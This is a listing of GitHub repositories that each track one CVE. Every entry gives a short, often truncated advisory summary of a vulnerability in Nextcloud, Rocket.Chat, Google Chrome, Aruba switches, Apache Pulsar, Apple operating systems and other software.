**Nextcloud Server before 9.0.55 and 10.0.2 suffers from a Denial of Service attack. Due to an error in the application logic an authenticated adversary may trigger an endless recursion in the application leading to a potential Denial of Service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-0886](https://github.com/Live-Hack-CVE/CVE-2017-0886) create time: 2022-12-29T12:32:49Z

**Nextcloud Server before 9.0.55 and 10.0.2 suffers from a creation of folders in read-only folders despite lacking permissions issue. Due to a logical error in the file caching layer an authenticated adversary is able to create empty folders inside a shared folder. Note that this only affects folders and files that the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-0884](https://github.com/Live-Hack-CVE/CVE-2017-0884) create time: 2022-12-29T12:32:46Z

**Nextcloud Server before 9.0.55 and 10.0.2 suffers from a bypass in the quota limitation. Due to not properly sanitizing values provided by the `OC-Total-Length` HTTP header an authenticated adversary may be able to exceed their configured user quota. Thus using more space than allowed by the administrator. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-0887](https://github.com/Live-Hack-CVE/CVE-2017-0887) create time: 2022-12-29T12:32:42Z

**Nextcloud Server before 9.0.55 and 10.0.2 suffers from a error message disclosing existence of file in write-only share. Due to an error in the application logic an adversary with access to a write-only share may enumerate the names of existing files and subfolders by comparing the exception messages. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-0885](https://github.com/Live-Hack-CVE/CVE-2017-0885) create time: 2022-12-29T12:32:39Z

**Nextcloud Server before 11.0.3 is vulnerable to an inadequate escaping leading to a XSS vulnerability in the search module. To be exploitable a user has to write or paste malicious content into the search dialogue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-0890](https://github.com/Live-Hack-CVE/CVE-2017-0890) create time: 2022-12-29T12:30:02Z

**Nextcloud Server before 11.0.3 is vulnerable to disclosure of valid share tokens for public calendars due to a logical error. Thus granting an attacker potentially access to publicly shared calendars without knowing the share token. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-0894](https://github.com/Live-Hack-CVE/CVE-2017-0894) create time: 2022-12-29T12:29:59Z

**Nextcloud Server before 11.0.3 is vulnerable to an improper session handling allowed an application specific password without permission to the files access to the users file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-0892](https://github.com/Live-Hack-CVE/CVE-2017-0892) create time: 2022-12-29T12:29:48Z

**Roundcube Webmail allows arbitrary password resets by authenticated users. This affects versions before 1.0.11, 1.1.x before 1.1.9, and 1.2.x before 1.2.5. The problem is caused by an improperly restricted exec call in the virtualmin and sasl drivers of the password plugin. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-8114](https://github.com/Live-Hack-CVE/CVE-2017-8114) create time: 2022-12-29T12:28:09Z

**stab_xcoff_builtin_type in stabs.c in GNU Binutils through 2.37 allows attackers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact, as demonstrated by an out-of-bounds write. NOTE: this issue exists because of an incorrect fix for CVE-2018-12699. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45078](https://github.com/Live-Hack-CVE/CVE-2021-45078) create time: 2022-12-29T11:47:28Z

**An out-of-bounds read was addressed with improved input validation. This issue is fixed in iCloud for Windows 11.4, iOS 14.0 and iPadOS 14.0, watchOS 7.0, tvOS 14.0, iCloud for Windows 7.21, iTunes for Windows 12.10.9. Processing a maliciously crafted tiff file may lead to a denial-of-service or potentially disclose me CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36521](https://github.com/Live-Hack-CVE/CVE-2020-36521) create time: 2022-12-29T12:33:20Z

**Insufficient protection of the server-side encryption keys in Nextcloud Server 19.0.1 allowed an attacker to replace the public key to decrypt them later on. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8152](https://github.com/Live-Hack-CVE/CVE-2020-8152) create time: 2022-12-29T12:30:59Z

**Insufficient protection of the server-side encryption keys in Nextcloud Server 19.0.1 allowed an attacker to replace the encryption keys. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8259](https://github.com/Live-Hack-CVE/CVE-2020-8259) create time: 2022-12-29T12:30:55Z

**A missing input validation in Nextcloud Server before 20.0.2, 19.0.5, 18.0.11 allows users to store unlimited data in workflow rules causing load and potential DDoS on later interactions and usage with those rules. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8293](https://github.com/Live-Hack-CVE/CVE-2020-8293) create time: 2022-12-29T12:30:51Z

**A wrong configuration in Nextcloud Server 19.0.1 incorrectly made the user feel the passwordless WebAuthn is also a two factor verification by asking for the PIN of the passwordless WebAuthn but not verifying it. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8236](https://github.com/Live-Hack-CVE/CVE-2020-8236) create time: 2022-12-29T12:30:27Z

**A too small set of random characters being used for encryption in Nextcloud Server 18.0.4 allowed decryption in shorter time than intended. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8173](https://github.com/Live-Hack-CVE/CVE-2020-8173) create time: 2022-12-29T12:30:24Z

**A logic error in Nextcloud Server 19.0.0 caused a plaintext storage of the share password when it was given on the initial create API call. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8183](https://github.com/Live-Hack-CVE/CVE-2020-8183) create time: 2022-12-29T12:30:20Z

**A cleartext storage of sensitive information in Nextcloud Desktop Client 2.6.4 gave away information about used proxies and their authentication credentials. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8225](https://github.com/Live-Hack-CVE/CVE-2020-8225) create time: 2022-12-29T12:30:17Z

**A memory corruption vulnerability exists in NextCloud Desktop Client v2.6.4 where missing ASLR and DEP protections in for windows allowed to corrupt memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8230](https://github.com/Live-Hack-CVE/CVE-2020-8230) create time: 2022-12-29T12:30:13Z

**A memory leak in the OCUtil.dll library used by Nextcloud Desktop Client 2.6.4 can lead to a DoS against the host system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8229](https://github.com/Live-Hack-CVE/CVE-2020-8229) create time: 2022-12-29T12:30:10Z

**Missing sanitization of a server response in Nextcloud Desktop Client 2.6.4 for Linux allowed a malicious Nextcloud Server to store files outside of the dedicated sync directory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8227](https://github.com/Live-Hack-CVE/CVE-2020-8227) create time: 2022-12-29T12:30:06Z

**A code injection in Nextcloud Desktop Client 2.6.2 for macOS allowed to load arbitrary code when starting the client with DYLD_INSERT_LIBRARIES set in the environment. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8140](https://github.com/Live-Hack-CVE/CVE-2020-8140) create time: 2022-12-29T12:29:55Z

**A cross-site scripting error in Nextcloud Desktop client 2.6.4 allowed to present any html (including local links) when responding with invalid data on the login attempt. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8189](https://github.com/Live-Hack-CVE/CVE-2020-8189) create time: 2022-12-29T12:29:52Z

**This vulnerability allows remote attackers to disclose sensitive information on affected installations of C-MORE HMI EA9 Firmware version 6.52 touch screen panels. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of passwords. When transmitting passwords, the pr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10919](https://github.com/Live-Hack-CVE/CVE-2020-10919) create time: 2022-12-29T12:28:19Z

**Vulnerability in the Java SE product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Java SE: 11.0.7 and 14.0.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability ca CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14562](https://github.com/Live-Hack-CVE/CVE-2020-14562) create time: 2022-12-29T11:55:30Z

**Chipolo ONE Bluetooth tracker (2020) Chipolo iOS app version 4.13.0 is vulnerable to Incorrect Access Control. Chipolo devices suffer from access revocation evasion attacks once the malicious sharee obtains the access credentials. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37193](https://github.com/Live-Hack-CVE/CVE-2022-37193) create time: 2022-12-29T11:53:15Z

**A flaw was found in Django REST Framework versions before 3.12.0 and before 3.11.2. When using the browseable API viewer, Django REST Framework fails to properly escape certain strings that can come from user input. This allows a user who can control those strings to inject malicious tags, leading to a cross-s CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25626](https://github.com/Live-Hack-CVE/CVE-2020-25626) create time: 2022-12-29T11:48:02Z

**IBM FileNet Content Manager and IBM Content Navigator 3.0.CD is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 188 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-4757](https://github.com/Live-Hack-CVE/CVE-2020-4757) create time: 2022-12-29T11:47:41Z

**An HTTP response splitting attack in web application in ASUS RT-AX88U before v3.0.0.4.388.20558 allows an attacker to craft a specific URL that if an authenticated victim visits it, the URL will give access to the cloud storage of the attacker. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41437](https://github.com/Live-Hack-CVE/CVE-2021-41437) create time: 2022-12-29T12:33:45Z

**Nextcloud server is an open source, self hosted personal cloud. Nextcloud supports rendering image previews for user provided file content. For some image types, the Nextcloud server was invoking a third-party library that wasn't suited for untrusted user-supplied content. There are several security concerns with passi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32802](https://github.com/Live-Hack-CVE/CVE-2021-32802) create time: 2022-12-29T12:32:04Z

**Nextcloud server is an open source, self hosted personal cloud. In affected versions logging of exceptions may have resulted in logging potentially sensitive key material for the Nextcloud Encryption-at-Rest functionality. It is recommended that the Nextcloud Server is upgraded to 20.0.12, 21.0.4 or 22.1.0. If upgradin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32801](https://github.com/Live-Hack-CVE/CVE-2021-32801) create time: 2022-12-29T12:31:56Z

**Nextcloud server is an open source, self hosted personal cloud. In affected versions an attacker is able to bypass Two Factor Authentication in Nextcloud. Thus knowledge of a password, or access to a WebAuthN trusted device of a user was sufficient to gain access to an account. It is recommended that the Nextcloud Serv CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32800](https://github.com/Live-Hack-CVE/CVE-2021-32800) create time: 2022-12-29T12:31:53Z

**Nextcloud text is a collaborative document editing using Markdown built for the nextcloud server. Due to an issue with the Nextcloud Text application, which is by default shipped with Nextcloud Server, an attacker is able to access the folder names of "File Drop". For successful exploitation an attacker requires knowle CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41233](https://github.com/Live-Hack-CVE/CVE-2021-41233) create time: 2022-12-29T12:31:21Z

**Nextcloud Text is an open source plaintext editing application which ships with the nextcloud server. In affected versions the Nextcloud Text application returned different error messages depending on whether a folder existed in a public link share. This is problematic in case the public link share has been created wit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32766](https://github.com/Live-Hack-CVE/CVE-2021-32766) create time: 2022-12-29T12:31:18Z

**The Nextcloud Desktop Client is a tool to synchronize files from Nextcloud Server with a computer. Clients using the Nextcloud end-to-end encryption feature download the public and private key via an API endpoint. In versions prior to 3.3.0, the Nextcloud Desktop client fails to check if a private key belongs to previo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32728](https://github.com/Live-Hack-CVE/CVE-2021-32728) create time: 2022-12-29T12:31:07Z

**A missing user check in Nextcloud prior to 20.0.6 inadvertently populates a user's own credentials for other users external storage configuration when not already configured yet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22877](https://github.com/Live-Hack-CVE/CVE-2021-22877) create time: 2022-12-29T12:31:03Z

**Multiple unauthenticated command injection vulnerabilities were discovered in the AOS-CX API interface in Aruba CX 6200F Switch Series, Aruba 6300 Switch Series, Aruba 6400 Switch Series, Aruba 8320 Switch Series, Aruba 8325 Switch Series, Aruba 8400 Switch Series, Aruba CX 8360 Switch Series version(s): AOS-CX 10.06.x CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41003](https://github.com/Live-Hack-CVE/CVE-2021-41003) create time: 2022-12-29T12:29:23Z

**Multiple authenticated remote path traversal vulnerabilities were discovered in the AOS-CX command line interface in Aruba CX 6200F Switch Series, Aruba 6300 Switch Series, Aruba 6400 Switch Series, Aruba 8320 Switch Series, Aruba 8325 Switch Series, Aruba 8400 Switch Series, Aruba CX 8360 Switch Series version(s): AOS CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41002](https://github.com/Live-Hack-CVE/CVE-2021-41002) create time: 2022-12-29T12:29:09Z

**An authenticated remote code execution vulnerability was discovered in the AOS-CX Network Analytics Engine (NAE) in Aruba CX 6200F Switch Series, Aruba 6300 Switch Series, Aruba 6400 Switch Series, Aruba 8320 Switch Series, Aruba 8325 Switch Series, Aruba 8400 Switch Series, Aruba CX 8360 Switch Series version(s): AOS- CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41001](https://github.com/Live-Hack-CVE/CVE-2021-41001) create time: 2022-12-29T12:29:05Z

**Multiple authenticated remote code execution vulnerabilities were discovered in the AOS-CX command line interface in Aruba CX 6200F Switch Series, Aruba 6300 Switch Series, Aruba 6400 Switch Series, Aruba 8320 Switch Series, Aruba 8325 Switch Series, Aruba 8400 Switch Series, Aruba CX 8360 Switch Series version(s): AOS CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41000](https://github.com/Live-Hack-CVE/CVE-2021-41000) create time: 2022-12-29T12:29:02Z

**This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 16.0.1-48919. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the Toolgate component CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27242](https://github.com/Live-Hack-CVE/CVE-2021-27242) create time: 2022-12-29T12:28:45Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 10.1.0.37527. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27271](https://github.com/Live-Hack-CVE/CVE-2021-27271) create time: 2022-12-29T12:28:41Z

**A crafted NTFS image can cause heap exhaustion in ntfs_get_attribute_value in NTFS-3G through 2021.8.22. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30784](https://github.com/Live-Hack-CVE/CVE-2022-30784) create time: 2022-12-29T11:57:43Z

**A crafted NTFS image can cause a heap-based buffer overflow in ntfs_names_full_collate in NTFS-3G through 2021.8.22. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30786](https://github.com/Live-Hack-CVE/CVE-2022-30786) create time: 2022-12-29T11:57:36Z

**Use after free in developer tools in Google Chrome prior to 96.0.4664.93 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4063](https://github.com/Live-Hack-CVE/CVE-2021-4063) create time: 2022-12-29T11:56:08Z

**Out of bounds write in WebRTC in Google Chrome prior to 96.0.4664.93 allowed a remote attacker to potentially exploit heap corruption via crafted WebRTC packets. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4079](https://github.com/Live-Hack-CVE/CVE-2021-4079) create time: 2022-12-29T11:56:05Z

**Type confusion in V8 in Google Chrome prior to 96.0.4664.93 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4078](https://github.com/Live-Hack-CVE/CVE-2021-4078) create time: 2022-12-29T11:56:01Z

**Insufficient data validation in new tab page in Google Chrome prior to 96.0.4664.93 allowed a remote attacker to leak cross-origin data via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4068](https://github.com/Live-Hack-CVE/CVE-2021-4068) create time: 2022-12-29T11:55:57Z

**Use after free in window manager in Google Chrome on ChromeOS prior to 96.0.4664.93 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4067](https://github.com/Live-Hack-CVE/CVE-2021-4067) create time: 2022-12-29T11:55:53Z

**Integer underflow in ANGLE in Google Chrome prior to 96.0.4664.93 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4066](https://github.com/Live-Hack-CVE/CVE-2021-4066) create time: 2022-12-29T11:55:49Z

**Use after free in autofill in Google Chrome prior to 96.0.4664.93 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4065](https://github.com/Live-Hack-CVE/CVE-2021-4065) create time: 2022-12-29T11:55:45Z

**Use after free in screen capture in Google Chrome on ChromeOS prior to 96.0.4664.93 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4064](https://github.com/Live-Hack-CVE/CVE-2021-4064) create time: 2022-12-29T11:55:41Z

**Heap buffer overflow in BFCache in Google Chrome prior to 96.0.4664.93 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4062](https://github.com/Live-Hack-CVE/CVE-2021-4062) create time: 2022-12-29T11:55:38Z

**Type confusion in V8 in Google Chrome prior to 96.0.4664.93 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4061](https://github.com/Live-Hack-CVE/CVE-2021-4061) create time: 2022-12-29T11:55:34Z

**An issue was discovered in Veritas Backup Exec before 21.2. The communication between a client and an Agent requires successful authentication, which is typically completed over a secure TLS communication. However, due to a vulnerability in the SHA Authentication scheme, an attacker is able to gain unauthorized access CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27876](https://github.com/Live-Hack-CVE/CVE-2021-27876) create time: 2022-12-29T11:55:27Z

**An issue was discovered in Veritas Backup Exec before 21.2. The communication between a client and an Agent requires successful authentication, which is typically completed over a secure TLS communication. However, due to a vulnerability in the SHA Authentication scheme, an attacker is able to gain unauthorized access CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27878](https://github.com/Live-Hack-CVE/CVE-2021-27878) create time: 2022-12-29T11:55:18Z

**An issue was discovered in Veritas Backup Exec before 21.2. It supports multiple authentication schemes: SHA authentication is one of these. This authentication scheme is no longer used in current versions of the product, but hadn't yet been disabled. An attacker could remotely exploit this scheme to gain unauthorized CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27877](https://github.com/Live-Hack-CVE/CVE-2021-27877) create time: 2022-12-29T11:55:15Z

**Insufficient data validation in loader in Google Chrome prior to 96.0.4664.93 allowed a remote attacker to leak cross-origin data via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4059](https://github.com/Live-Hack-CVE/CVE-2021-4059) create time: 2022-12-29T11:55:11Z

**An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. An SMM callout vulnerability in the SMM driver FwBlockServiceSmm, creating SMM, leads to arbitrary code execution. An attacker can replace the pointer to the UEFI boot service GetVariable with a pointer to malware, and then generate a software SMI CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36338](https://github.com/Live-Hack-CVE/CVE-2022-36338) create time: 2022-12-29T12:33:37Z

**Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability Add Shortcodes Actions And Filters plugin <= 2.0.9 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37342](https://github.com/Live-Hack-CVE/CVE-2022-37342) create time: 2022-12-29T12:33:34Z

**Authenticated (author+) CSV Injection vulnerability in Export Post Info plugin <= 1.2.0 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38061](https://github.com/Live-Hack-CVE/CVE-2022-38061) create time: 2022-12-29T12:33:30Z

**IBM Jazz for Service Management 1.1.3 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 231380. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35721](https://github.com/Live-Hack-CVE/CVE-2022-35721) create time: 2022-12-29T12:33:27Z

**Cross site scripting (XSS) vulnerability in kfm through 1.4.7 via crafted GET request to /kfm/index.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40359](https://github.com/Live-Hack-CVE/CVE-2022-40359) create time: 2022-12-29T12:33:24Z

**An improper authentication vulnerability exists in Rocket.Chat Mobile App <4.14.1.22788 that allowed an attacker with physical access to a mobile device to bypass local authentication (PIN code). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30124](https://github.com/Live-Hack-CVE/CVE-2022-30124) create time: 2022-12-29T12:33:16Z

**Apache Pulsar Brokers and Proxies create an internal Pulsar Admin Client that does not verify peer TLS certificates, even when tlsAllowInsecureConnection is disabled via configuration. The Pulsar Admin Client's intra-cluster and geo-replication HTTPS connections are vulnerable to man in the middle attacks, which could CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33683](https://github.com/Live-Hack-CVE/CVE-2022-33683) create time: 2022-12-29T12:33:13Z

**TLS hostname verification cannot be enabled in the Pulsar Broker's Java Client, the Pulsar Broker's Java Admin Client, the Pulsar WebSocket Proxy's Java Client, and the Pulsar Proxy's Admin Client leaving intra-cluster connections and geo-replication connections vulnerable to man in the middle attacks, which could leak CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33682](https://github.com/Live-Hack-CVE/CVE-2022-33682) create time: 2022-12-29T12:33:09Z

**A cleartext storage of sensitive information exists in Rocket.Chat <v4.6.4 due to Oauth token being leaked in plaintext in Rocket.chat logs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32217](https://github.com/Live-Hack-CVE/CVE-2022-32217) create time: 2022-12-29T12:33:06Z

**An improper access control vulnerability exists in Rocket.Chat <v5, <v4.8.2 and <v4.7.5 due to input data in the getUsersOfRoom Meteor server method is not type validated, so that MongoDB query operator objects are accepted by the server, so that instead of a matching rid String a$regex query can be executed, bypassing CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32226](https://github.com/Live-Hack-CVE/CVE-2022-32226) create time: 2022-12-29T12:33:02Z

**A NoSQL-Injection information disclosure vulnerability vulnerability exists in Rocket.Chat <v5, <v4.8.2 and <v4.7.5 in the getS3FileUrl Meteor server method that can disclose arbitrary file upload URLs to users that should not be able to access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35246](https://github.com/Live-Hack-CVE/CVE-2022-35246) create time: 2022-12-29T12:32:58Z

**A privilege escalation vulnerability exists in Rocket.chat <v5 which made it possible to elevate privileges for any authenticated user to view Direct messages without appropriate permissions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35250](https://github.com/Live-Hack-CVE/CVE-2022-35250) create time: 2022-12-29T12:32:53Z

**An information disclosure vulnerability exists in Rocket.Chat <v4.7.5 which allowed the "users.list" REST endpoint gets a query parameter from JSON and runs Users.find(queryFromClientSide). This means virtually any authenticated user can access any data (except password hashes) of any user authenticated. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32219](https://github.com/Live-Hack-CVE/CVE-2022-32219) create time: 2022-12-29T12:32:35Z

**netlify-ipx is an on-Demand image optimization for Netlify using ipx. In versions prior to 1.2.3, an attacker can bypass the source image domain allowlist by sending specially crafted headers, causing the handler to load and return arbitrary images. Because the response is cached globally, this image will then be serve CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39239](https://github.com/Live-Hack-CVE/CVE-2022-39239) create time: 2022-12-29T12:32:32Z

**Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform. Prior to versions 22.2.7 and 23.0.4, missing input-size validation of new session names allows users to create app passwords with long names. These long names are then loaded into memory on usage, resulting in impacted perf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29243](https://github.com/Live-Hack-CVE/CVE-2022-29243) create time: 2022-12-29T12:32:22Z

**An information disclosure vulnerability exists in Rocket.Chat <v5 due to the getUserMentionsByChannel meteor server method discloses messages from private channels and direct messages regardless of the users access permission to the room. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32220](https://github.com/Live-Hack-CVE/CVE-2022-32220) create time: 2022-12-29T12:32:00Z

**An information disclosure vulnerability exists in Rocket.Chat <v5, <v4.8.2 and <v4.7.5 since the getReadReceipts Meteor server method does not properly filter user inputs that are passed to MongoDB queries, allowing $regex queries to enumerate arbitrary Message IDs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32228](https://github.com/Live-Hack-CVE/CVE-2022-32228) create time: 2022-12-29T12:31:49Z

**A cleartext transmission of sensitive information exists in Rocket.Chat <v5, <v4.8.2 and <v4.7.5 relating to Oauth tokens by having the permission "view-full-other-user-info", this could cause an oauth token leak in the product. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32227](https://github.com/Live-Hack-CVE/CVE-2022-32227) create time: 2022-12-29T12:31:46Z

**An information disclosure vulnerability exists in Rocket.Chat <v5, <v4.8.2 and <v4.7.5 due to the actionLinkHandler method was found to allow Message ID Enumeration with Regex MongoDB queries. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32218](https://github.com/Live-Hack-CVE/CVE-2022-32218) create time: 2022-12-29T12:31:42Z

**IBM Common Cryptographic Architecture (CCA 5.x MTM for 4767 and CCA 7.x MTM for 4769) could allow a local user to cause a denial of service due to improper input validation. IBM X-Force ID: 223596. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22423](https://github.com/Live-Hack-CVE/CVE-2022-22423) create time: 2022-12-29T12:31:39Z

**A information disclosure vulnerability exists in Rockert.Chat <v5 due to /api/v1/chat.getThreadsList lack of sanitization of user inputs and can therefore leak private thread messages to unauthorized users via Mongo DB injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32229](https://github.com/Live-Hack-CVE/CVE-2022-32229) create time: 2022-12-29T12:31:35Z

**The issue was addressed with improved memory handling. This issue is fixed in watchOS 8.7, tvOS 15.6, iOS 15.6 and iPadOS 15.6, macOS Monterey 12.5. Processing a maliciously crafted image may result in disclosure of process memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32841](https://github.com/Live-Hack-CVE/CVE-2022-32841) create time: 2022-12-29T12:31:32Z

**A local file disclosure vulnerability in /appConfig/userDB.json of Telos Alliance Omnia MPX Node through 1.0.0-1.4.9 allows attackers to access users credentials which makes him able to gain initial access to the control panel with high privilege because the cleartext storage of sensitive information which can be unlat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36642](https://github.com/Live-Hack-CVE/CVE-2022-36642) create time: 2022-12-29T12:31:28Z

**Delayed TLS hostname verification in the Pulsar Java Client and the Pulsar Proxy make each client vulnerable to a man in the middle attack. Connections from the Pulsar Java Client to the Pulsar Broker/Proxy and connections from the Pulsar Proxy to the Pulsar Broker are vulnerable. Authentication data is sent before ver CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33681](https://github.com/Live-Hack-CVE/CVE-2022-33681) create time: 2022-12-29T12:31:25Z

**A heap out-of-bounds memory write exists in FFMPEG since version 5.1. The size calculation in `build_open_gop_key_points()` goes through all entries in the loop and adds `sc->ctts_data[i].count` to `sc->sample_offsets_count`. This can lead to an integer overflow resulting in a small allocation with `av_calloc()`. An at CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2566](https://github.com/Live-Hack-CVE/CVE-2022-2566) create time: 2022-12-29T12:29:45Z

**An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Monterey 12.5. An app may be able to gain elevated privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32798](https://github.com/Live-Hack-CVE/CVE-2022-32798) create time: 2022-12-29T12:29:41Z

**IBM Sterling Partner Engagement Manager 6.1 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 230017. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34348](https://github.com/Live-Hack-CVE/CVE-2022-34348) create time: 2022-12-29T12:29:38Z

**This issue was addressed with improved checks. This issue is fixed in iOS 15.6 and iPadOS 15.6, macOS Monterey 12.5. An app may be able to execute arbitrary code with kernel privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32829](https://github.com/Live-Hack-CVE/CVE-2022-32829) create time: 2022-12-29T12:29:34Z

**The issue was addressed with improved memory handling. This issue is fixed in iOS 15.6 and iPadOS 15.6, tvOS 15.6, macOS Monterey 12.5. An app may be able to disclose kernel memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32828](https://github.com/Live-Hack-CVE/CVE-2022-32828) create time: 2022-12-29T12:29:30Z

**This issue was addressed with improved checks. This issue is fixed in watchOS 8.7, iOS 15.6 and iPadOS 15.6, macOS Monterey 12.5. An app may be able to break out of its sandbox. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32845](https://github.com/Live-Hack-CVE/CVE-2022-32845) create time: 2022-12-29T12:29:27Z

